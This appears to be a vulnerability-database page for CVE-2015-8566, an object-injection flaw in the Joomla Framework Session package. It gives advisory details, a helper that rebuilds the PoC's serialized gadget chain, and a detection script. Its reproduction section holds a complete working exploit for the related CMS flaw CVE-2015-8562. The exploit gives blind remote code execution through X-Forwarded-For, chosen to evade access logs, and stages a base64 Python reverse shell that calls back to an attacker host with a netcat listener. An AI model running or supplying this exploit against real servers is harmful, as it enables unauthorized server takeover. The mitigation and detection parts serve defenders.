CVE-2015-8566
Description
Session package 1.x before 1.3.1 for Joomla! Framework allows remote code execution via crafted session values.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability
The Session package of the Joomla! Framework, in every 1.x release before 1.3.1, filters session data inadequately (the advisory classifies the flaw as an input validation error). Session values that originate from the client are stored and later read back and unserialized, so an attacker who controls them can inject serialized PHP objects and reach remote code execution. All 1.x releases before the 1.3.1 fix are affected [1][2][4].
Exploitation
An attacker needs only network access to an application that uses the vulnerable Session package: the crafted values travel in an ordinary HTTP request, the application stores them in the session without adequate filtering, and they are processed unsafely when the session is loaded again. No authentication is needed, because a session is created for unauthenticated visitors as well, and no user interaction is required beyond the attacker's own requests. The references do not document exploitation steps for the Framework package itself; the public PoC reproduced on this page targets the related Joomla CMS issue, CVE-2015-8562, as its own header states [1][4].
Impact
Successful exploitation allows remote code execution on the server. The attacker gains the ability to run arbitrary commands or code with the privileges of the web server process. This can lead to full compromise of the application and potentially the underlying system, including data theft, modification, or service disruption [1][2].
Mitigation
Upgrade the Session package to version 1.3.1 or later, released on 14 December 2015 [1][2]. In a Composer-managed project, constrain `joomla/session` to `^1.3.1`; the GitHub advisory lists 1.3.1 as the patched version, so moving to the later 2.x line is not required to remediate. No workarounds are documented. The vulnerability is not listed in CISA's Known Exploited Vulnerabilities (KEV) catalog as of the publication date [3].
AI Insight generated on May 23, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
| joomla/session (Packagist) | < 1.3.1 | 1.3.1 |
Affected products: 2
Patches: 0
No patches discovered yet.
Vulnerability mechanics
Root cause
"The Session package improperly handles session values, allowing for object injection and arbitrary code execution."
Attack vector
The referenced PoC, written for the Joomla CMS counterpart CVE-2015-8562, delivers the payload in a client-controlled request header: User-Agent in the original Sec-1 exploit, X-Forwarded-For in the modified script, chosen because that header is not written to access.log by default. Joomla stores the header value in the session record without neutralising it; when the session is read back, the serialized object graph it contains is instantiated, and the resulting gadget chain ends in code execution on the server [ref_id=1].
Affected code
The vulnerability resides in the Session package of the Joomla Framework, versions before 1.3.1. The PoC's serialized object graph names Joomla CMS library classes: JDatabaseDriverMysqli (whose disconnect handlers are invoked when the object is destroyed), JSimplepieFactory, and SimplePie (whose cache_name_function is set to assert so that the attacker-supplied feed_url is evaluated as PHP). These are classes of the CMS rather than of the standalone, namespaced Framework package, which is why the script as written targets CMS installations [ref_id=1].
What the fix does
No fix commit is included in the reference bundle, so the following is inferred from the advisory. Versions before 1.3.1 are affected and updating to 1.3.1 or later remediates the issue. Since the root cause is the improper handling of session values that permits object injection, the fix has to ensure that externally supplied session data can no longer be turned into instantiated objects, or into executed code, when the session is read back.
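The length rule and the `\0\0\0` trick behind the PoC's serialized template, as an added example that is not code from the page's PoC or from the Joomla project. It pairs a small PHP serialize()/unserialize() implementation with the two substitutions Joomla's database session storage applies on write and read: PHP marks a protected property with the three bytes NUL, `*`, NUL, the storage layer writes those as the six printable characters `\0\0\0` and restores them on read. That behaviour is not stated on this page; it is taken from the CMS session storage class and is what lets the PoC spell the property names in a raw string while still declaring `s:21`, the byte length of the real form. The object graph is the PoC's template built structurally so that the serializer computes every length; the function names and the benign `phpinfo()` payload are my own choices.

```python
#!/usr/bin/env python3
"""Added example, not code from the page's PoC or from Joomla: a small PHP
serialize()/unserialize() pair plus the write()/read() substitutions of
Joomla's database session storage, showing why the PoC can write protected
property names as printable \\0\\0\\0 in a raw string yet declare s:21."""

PROTECTED = '\0*\0'         # PHP's prefix for a protected property name (3 bytes)
LITERAL_ESCAPE = r'\0\0\0'   # the six printable characters stored in the DB instead


def php_serialize(v):
    """Subset of PHP serialize(): null, bool, int, str, array (dict), object
    (dict with a '__class__' key). Declared string lengths are byte counts."""
    if v is None:
        return 'N;'
    if isinstance(v, bool):
        return f'b:{int(v)};'
    if isinstance(v, int):
        return f'i:{v};'
    if isinstance(v, str):
        return f's:{len(v.encode("latin-1"))}:"{v}";'
    props = [(k, x) for k, x in v.items() if k != '__class__']
    body = ''.join(php_serialize(k) + php_serialize(x) for k, x in props)
    if '__class__' in v:
        return f'O:{len(v["__class__"])}:"{v["__class__"]}":{len(props)}:{{{body}}}'
    return f'a:{len(props)}:{{{body}}}'


def php_unserialize(data):
    """Parse one PHP-serialized value -> (value, offset after it). Objects and
    arrays become dicts; a ValueError means a declared length does not fit."""
    def read_len(pos):                       # '<digits>:' -> (n, offset after ':')
        colon = data.index(':', pos)
        return int(data[pos:colon]), colon + 1

    def value(pos):
        t = data[pos]
        if t == 'N':
            return None, pos + 2
        if t in 'ib':
            end = data.index(';', pos)
            n = int(data[pos + 2:end])
            return (bool(n) if t == 'b' else n), end + 1
        if t == 's':
            n, pos = read_len(pos + 2)           # pos lands on the opening quote
            if data[pos + 1 + n:pos + 3 + n] != '";':
                raise ValueError(f'declared length {n} does not fit at offset {pos}')
            return data[pos + 1:pos + 1 + n], pos + 3 + n
        if t in 'aO':
            out, pos = {}, pos + 2
            if t == 'O':
                n, pos = read_len(pos)
                out['__class__'] = data[pos + 1:pos + 1 + n]
                pos += 3 + n                     # skip '":' after the class name
            n, pos = read_len(pos)
            pos += 1                             # skip '{'
            for _ in range(n):
                k, pos = value(pos)
                out[k], pos = value(pos)
            return out, pos + 1                  # skip '}'
        raise ValueError(f'unsupported type {t!r} at offset {pos}')

    return value(0)


def session_storage_write(data):
    """Joomla's database session storage writes NUL-*-NUL as printable \\0\\0\\0."""
    return data.replace(PROTECTED, LITERAL_ESCAPE)


def session_storage_read(data):
    """The inverse substitution, applied when the session is loaded."""
    return data.replace(LITERAL_ESCAPE, PROTECTED)


def build_gadget(php_code):
    """The PoC's object graph: on destruction JDatabaseDriverMysqli calls its
    disconnect handlers, here SimplePie::init(), whose cache_name_function
    ('assert') is applied to feed_url. php_code must be quote-free PHP."""
    simplepie = {'__class__': 'SimplePie',
                 'sanitize': {'__class__': 'JDatabaseDriverMysql'},
                 'feed_url': f'{php_code};JFactory::getConfig();exit',
                 'cache_name_function': 'assert', 'cache': True,
                 'cache_class': {'__class__': 'JDatabaseDriverMysql'}}
    return {'__class__': 'JDatabaseDriverMysqli',
            'fc': {'__class__': 'JSimplepieFactory'},
            PROTECTED + 'disconnectHandlers': {0: {0: simplepie, 1: 'init'}},
            PROTECTED + 'connection': True}


def unserializes(data):
    """True if data parses as one well-formed PHP value."""
    try:
        php_unserialize(data)
        return True
    except (ValueError, IndexError):
        return False


def chain_summary(stored):
    """Load a stored value as the application would (read-side substitution,
    then unserialize) and name the pieces of the chain."""
    obj = php_unserialize(session_storage_read(stored))[0]
    handler, method = obj[PROTECTED + 'disconnectHandlers'][0].values()
    return {'outer': obj['__class__'], 'handler': f"{handler['__class__']}::{method}",
            'evaluator': handler['cache_name_function'], 'evaluated': handler['feed_url']}


if __name__ == '__main__':
    stored = session_storage_write(php_serialize(build_gadget('phpinfo()')))
    print(stored)
    print('parses as stored:', unserializes(stored))                           # False
    print('parses after read():', unserializes(session_storage_read(stored)))  # True
    print(chain_summary(stored))
```

Run stand-alone it prints the stored form, which is byte-for-byte the PoC's template around a `phpinfo()` body, then shows that the stored text fails to unserialize (the parser reads 21 characters of a 24-character name and finds no closing `";`) while the read-side substitution makes it parse into the JDatabaseDriverMysqli → SimplePie::init → assert(feed_url) chain. The PoC's trailing `\xf0\xfd\xfd\xfd`, which makes a utf8 database column cut off the rest of the session record, is not modelled here.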
Preconditions
- Input: the attacker must be able to send a crafted session value, in the PoC via the X-Forwarded-For header.
- Config: the target must run a vulnerable version of the Joomla Framework's Session package (1.x before 1.3.1).
Reproduction
```python
#!/usr/bin/env python3
# Exploit Title: Joomla 1.5 - 3.4.6 Object Injection RCE X-Forwarded-For header
# Date: 12/17/2015
# Exploit Author: original - Gary@ Sec-1 ltd, Modified - Andrew McNicol BreakPoint Labs (@0xcc_labs)
# Vendor Homepage: https://www.joomla.org/
# Software Link: http://joomlacode.org/gf/project/joomla/frs/
# Version: Joomla 1.5 - 3.4.6
# Tested on: Ubuntu 14.04.2 LTS (Joomla! 3.2.1 Stable)
# CVE : CVE-2015-8562
#
# Reproduced here from the Python 2 original with print()/input() and the
# bytes handling ported to Python 3; payload construction is unchanged.
'''
Joomla 1.5 - 3.4.6 Object Injection RCE - CVE-2015-8562
PoC for CVE-2015-8562 to spawn a reverse shell or automate RCE

Original PoC from Gary@ Sec-1 ltd (http://www.sec-1.com): https://www.exploit-db.com/exploits/38977/
Vulnerability Info, Exploit, Detection: https://breakpoint-labs.com/joomla-rce-cve-2015-8562/
Exploit modified to use "X-Forwarded-For" header instead of "User-Agent" to avoid being logged to access.log by default

Usage - Automate Blind RCE:
    python joomla-rce-2-shell.py -t http://192.168.1.139/ --cmd
    $ touch /tmp/newhnewh

Usage - Spawn Reverse Shell using Pentestmonkey's Python one-liner and netcat listener on local host:
    python joomla-rce-2-shell.py -t http://192.168.1.139/ -l 192.168.1.119 -p 4444
    [-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: http://192.168.1.139/
    [-] Uploading python reverse shell with LHOST:192.168.1.119 and LPORT:4444
    <Response [200]>
    [+] Spawning reverse shell....
    <Response [200]>

    Listening on [0.0.0.0] (family 0, port 4444)
    $ python -c "import pty;pty.spawn('/bin/bash')"
    www-data@ubuntu:/$ id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    www-data@ubuntu:/$
'''
import argparse
import base64
import subprocess

import requests


# Heavy lifting from PoC author Gary@ Sec-1 ltd (http://www.sec-1.com)
def get_url(url, payload):
    """Send the payload in X-Forwarded-For. The first request obtains a session
    cookie (the server stores the header value in that session); the repeated
    requests with the same cookie make the server load the stored session again."""
    headers = {
        # Change default UA for Requests
        'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3',
        'x-forwarded-for': payload,  # X-Forwarded-For header instead of UA
    }
    cookies = requests.get(url, headers=headers).cookies
    for _ in range(3):
        response = requests.get(url, headers=headers, cookies=cookies)
    return response


def php_str_noquotes(data):
    """Convert string to chr(xx).chr(xx) for use in php"""
    encoded = ""
    for char in data:
        encoded += "chr({0}).".format(ord(char))
    return encoded[:-1]


def generate_payload(php_payload):
    php_payload = "eval({0})".format(php_str_noquotes(php_payload))
    # Bytes that are not valid UTF-8; a utf8 (not utf8mb4) MySQL column truncates
    # the stored session data at this point. Sent as latin-1 by requests.
    terminate = '\xf0\xfd\xfd\xfd'
    # Raw strings on purpose: the literal \0\0\0 is what the session storage turns
    # into the NUL-*-NUL prefix of a protected property when the session is read.
    exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'''
    injected_payload = "{};JFactory::getConfig();exit".format(php_payload)
    exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload)
    exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate
    return exploit_template


def main():
    parser = argparse.ArgumentParser(prog='cve-2015-8562.py',
                                     description='Automate blind RCE for Joomla vuln CVE-2015-8562')
    parser.add_argument('-t', dest='RHOST', required=True, help='Remote Target Joomla Server')
    parser.add_argument('-l', dest='LHOST', help='specify local ip for reverse shell')
    parser.add_argument('-p', dest='LPORT', help='specify local port for reverse shell')
    parser.add_argument('--cmd', dest='cmd', action='store_true', help='drop into blind RCE')
    args = parser.parse_args()

    if args.cmd:
        print("[-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: {}".format(args.RHOST))
        print("[-] Dropping into shell-like environment to perform blind RCE")
        while True:
            command = input('$ ')
            cmd_str = "system('{}');".format(command)
            pl = generate_payload(cmd_str)
            print(get_url(args.RHOST, pl))

    # Spawn Reverse Shell using Netcat listener + Python shell on victim
    elif args.LHOST and args.LPORT:
        connection = "'{}', {}".format(args.LHOST, args.LPORT)
        # pentestmonkey's Python reverse shell one-liner:
        shell_str = ('import socket,subprocess,os;'
                     's=socket.socket(socket.AF_INET,socket.SOCK_STREAM);'
                     's.connect((' + connection + '));'
                     'os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);'
                     'p=subprocess.call(["/bin/sh","-i"]);')
        # Base64 encoded the Python reverse shell as some chars were messing up in the exploit
        encoded_comm = base64.b64encode(shell_str.encode()).decode()
        # Stage 1 payload Str
        payload = "echo {} | base64 -d > /tmp/newhnewh.py".format(encoded_comm)
        print("[-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: {}".format(args.RHOST))
        print("[-] Uploading python reverse shell with LHOST {} and {}".format(args.LHOST, args.LPORT))
        # Stage 1: Uploads the Python reverse shell to "/tmp/newhnewh.py"
        pl = generate_payload("system('" + payload + "');")
        print(get_url(args.RHOST, pl))
        # Spawns Shell listener using netcat on LHOST
        listener = subprocess.Popen(args=["gnome-terminal", "--command=nc -lvp " + args.LPORT])
        print("[+] Spawning reverse shell....")
        # Stage 2: Executes Python reverse shell back to LHOST:LPORT
        pl = generate_payload("system('python /tmp/newhnewh.py');")
        print(get_url(args.RHOST, pl))
    else:
        print('[!] missing arguments')
        parser.print_help()


if __name__ == "__main__":
    main()
```
[ref_id=1]
**Usage - Automate Blind RCE:**

```bash
python joomla-rce-2-shell.py -t http://192.168.1.139/ --cmd
$ touch /tmp/newhnewh
```

After `--cmd` the script shows a `$ ` prompt; each command typed there is wrapped in `system()` and sent blind, so nothing but the HTTP response object is printed.

**Usage - Spawn Reverse Shell:**

```bash
python joomla-rce-2-shell.py -t http://192.168.1.139/ -l 192.168.1.119 -p 4444
```

This will attempt to exploit the vulnerability, upload a Python reverse shell to `/tmp/newhnewh.py`, and then execute it to establish a connection back to the specified LHOST and LPORT. A netcat listener is spawned on the attacker's machine to receive the shell. [ref_id=1]
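A detection pass over constructed log lines and session-table rows, as an added example that is not code from the page's PoC, from the BreakPoint Labs write-up or from Joomla. The modified script moves the payload into X-Forwarded-For precisely because that header is absent from the default access log, so the example assumes a log format that records both User-Agent and X-Forwarded-For (nginx style, with `\xHH` escaping of quotes and backslashes) and also inspects rows of the session table, where the payload lands whichever header carried it. In a request log any serialized PHP object inside a header field is flagged; session rows legitimately contain serialized objects such as the user object, so for them only markers specific to this gadget count. The regexes, the nginx escaping helper and all sample data are assumptions of mine.

```python
#!/usr/bin/env python3
"""Added detection example, not code from the page's PoC, the BreakPoint Labs
write-up or Joomla. Flags request-log lines whose header fields carry a PHP
serialized object, flags session-table rows that contain this gadget, and
decodes the chr()-chains the PoC uses to keep quotes out of its command."""
import re

# O:<len>:"<Class>":<count>:{ opens a serialized PHP object; namespaced class
# names carry backslashes. No browser puts this in a request header.
SERIALIZED_OBJECT = re.compile(r'O:\d+:"[A-Za-z0-9_\\]+":\d+:\{')
CHR_CHAIN = re.compile(r'(?:chr\(\d+\)\.?){4,}')
# Session rows legitimately hold serialized objects (Joomla keeps the user
# object there), so rows are judged on markers specific to this gadget.
GADGET_INDICATORS = [
    (re.compile(r'\}__\w+\|O:\d+:"'),
     'stray session key followed by a serialized object'),
    (re.compile(r'"cache_name_function";s:\d+:"(?:assert|system|exec|passthru|shell_exec)"'),
     'SimplePie cache_name_function set to a code-execution function'),
    (re.compile(r'"JDatabaseDriverMysqli":\d+:\{.*?disconnectHandlers', re.S),
     'JDatabaseDriverMysqli with attacker-supplied disconnectHandlers'),
]


def unescape_nginx(line):
    """nginx logs quotes and backslashes inside header values as \\xHH."""
    return re.sub(r'\\x([0-9A-Fa-f]{2})', lambda m: chr(int(m.group(1), 16)), line)


def decode_chr_chains(text):
    """chr(115).chr(121)... -> the string it spells, one entry per chain found."""
    return [''.join(chr(int(n)) for n in re.findall(r'chr\((\d+)\)', m.group(0)))
            for m in CHR_CHAIN.finditer(text)]


def scan_log_lines(lines):
    """(line_no, decoded_commands) for every line carrying a serialized object."""
    hits = []
    for no, raw in enumerate(lines, 1):
        line = unescape_nginx(raw)
        if SERIALIZED_OBJECT.search(line):
            hits.append((no, decode_chr_chains(line)))
    return hits


def scan_session_rows(rows):
    """rows: (session_id, data) pairs -> (session_id, reasons, decoded_commands)."""
    hits = []
    for sid, data in rows:
        reasons = [why for rx, why in GADGET_INDICATORS if rx.search(data)]
        if reasons:
            hits.append((sid, reasons, decode_chr_chains(data)))
    return hits


# --- constructed sample data; not captured from any real system -------------
def _chr_chain(s):
    return '.'.join(f'chr({ord(c)})' for c in s)


_cmd = _chr_chain("system('id')")
_feed = f'eval({_cmd});JFactory::getConfig();exit'
SAMPLE_PAYLOAD = (
    '}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}'
    's:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{'
    's:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}'
    f's:8:"feed_url";s:{len(_feed)}:"{_feed}";'
    's:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;'
    's:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}'
    's:13:"\\0\\0\\0connection";b:1;}')


def _nginx_escape(value):
    return value.replace('\\', '\\x5C').replace('"', '\\x22')


# log_format ending in "$http_user_agent" "$http_x_forwarded_for"
SAMPLE_LOG = [
    '192.0.2.7 - - [17/Dec/2015:10:15:01 +0000] "GET / HTTP/1.1" 200 5123 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64) Firefox/42.0" "-"',
    '192.0.2.9 - - [17/Dec/2015:10:15:04 +0000] "GET / HTTP/1.1" 200 5123 "-" '
    '"Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X)" "'
    + _nginx_escape(SAMPLE_PAYLOAD) + '"',
]
SAMPLE_ROWS = [
    ('legit', '__default|a:2:{s:15:"session.counter";i:3;s:4:"user";O:5:"JUser":1:{s:5:"guest";i:1;}}'),
    # the attacker's row once the utf8 column has cut the record off at the PoC's terminator
    ('evil', '__default|a:1:{s:22:"session.client.browser";s:512:"' + SAMPLE_PAYLOAD),
]

if __name__ == '__main__':
    for no, cmds in scan_log_lines(SAMPLE_LOG):
        print(f'log line {no}: serialized object in a header; decoded {cmds}')
    for sid, reasons, cmds in scan_session_rows(SAMPLE_ROWS):
        print(f'session {sid}: {"; ".join(reasons)}; decoded {cmds}')
```

Pointing `scan_session_rows` at the real `#__session` table's `data` column is the check that works after the fact, because the row survives until the session expires even when the request itself was never logged; the chr()-chain decoder turns the flagged row straight into the command the attacker ran.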
Generated on Jun 2, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
- developer.joomla.org/security-centre/637-20151205-session-remote-code-execution-vulnerability.html (NVD: Vendor Advisory)
- github.com/advisories/GHSA-wwfh-28hx-w2r2 (GHSA: Advisory)
- nvd.nist.gov/vuln/detail/CVE-2015-8566 (GHSA: Advisory)
- github.com/FriendsOfPHP/security-advisories/blob/master/joomla/session/CVE-2015-8566.yaml (GHSA: Web)
- web.archive.org/web/20160603093633/http://www.securityfocus.com/bid/79197 (GHSA: Web)
- www.securityfocus.com/bid/79197 (NVD)
News mentions
No linked articles in our index yet.